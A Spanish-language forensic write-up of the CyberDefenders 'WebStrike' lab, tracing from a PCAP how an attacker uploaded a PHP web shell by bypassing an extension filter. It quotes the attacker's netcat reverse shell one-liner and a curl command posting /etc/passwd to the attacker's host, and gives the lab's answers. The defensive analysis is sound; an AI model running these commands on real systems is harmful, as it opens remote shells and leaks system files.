WebStrike - CyberDefenders
Escenario
Actividad sospechosa en un servidor web corporativo. Se dispone de un PCAP para analizar cómo el atacante subió una web shell, ejecutó una reverse shell e intentó exfiltrar datos.
- Víctima: Servidor web (Linux/Apache)
- Evidencia: PCAP (tráfico de red)
- Misión: Identificar entrada, archivos subidos, comandos ejecutados, datos objetivo
Herramientas
- Wireshark — análisis PCAP, HTTP Stream, filtros
- IP Geolocation — geolocalización del atacante
Análisis
Q1. ¿De qué ciudad se originó el ataque?
Respuesta: Tianjin, China
Evidencia: Statistics → Endpoints → IPv4 muestra la IP 117.11.88.124 como origen. Geolocalización vía ipgeolocation.io la ubica en Tianjin.
Q2. ¿Cuál es el User-Agent del atacante?
Respuesta: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Evidencia: Siguiendo el HTTP Stream del atacante, la solicitud GET revela este User-Agent. El atacante se hace pasar por Firefox en Linux para mezclarse con tráfico legítimo.
P3. ¿Cuál es el nombre del shell web malicioso que se cargó correctamente?
Respuesta: image.jpg.php
Evidencia: Filtro ip.src == 117.11.88.124 && http.request.method == "POST" revela dos intentos:
- Primero:
image.php→ rechazado (Invalid file format) - Segundo:
image.jpg.php→ éxito (File uploaded successfully)
El atacante evade la validación del servidor añadiendo .jpg al nombre — bypass de filtro de extensiones.
Q4. ¿Qué directorio utiliza el sitio web para almacenar los archivos cargados?
Respuesta: /reviews/uploads/
Evidencia: Tras la carga, una solicitud GET a /reviews/uploads devuelve 301 Moved Permanently redirigiendo a /reviews/uploads/. Las cargas se procesan vía /reviews/upload.php.
Q5. ¿Qué puerto en la máquina del atacante fue usado para la reverse shell?
Respuesta: 8080
Evidencia: El contenido de image.jpg.php contiene el comando de reverse shell:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 117.11.88.124 8080 > /tmp/fNetcat (nc) conecta de vuelta a 117.11.88.124:8080.
P6. ¿Qué archivo intentaba exfiltrar el atacante?
Respuesta: /etc/passwd
Evidencia: Filtro (tcp.port == 8080) && (ip.src == 24.49.63.79). En el flujo TCP de la reverse shell, el atacante ejecuta:
curl -X POST -d /etc/passwd http://117.11.88.124:443/El archivo /etc/passwd permite enumerar usuarios del sistema para escalada de privilegios.
MITRE ATT&CK
| Táctica | Técnica |
|---|---|
| Initial Access | T1190 — Exploit Public-Facing Application |
| Execution | T1059.004 — Unix Shell (reverse shell) |
| Persistence | T1505.003 — Web Shell |
| Exfiltration | T1041 — Exfiltration Over C2 Channel |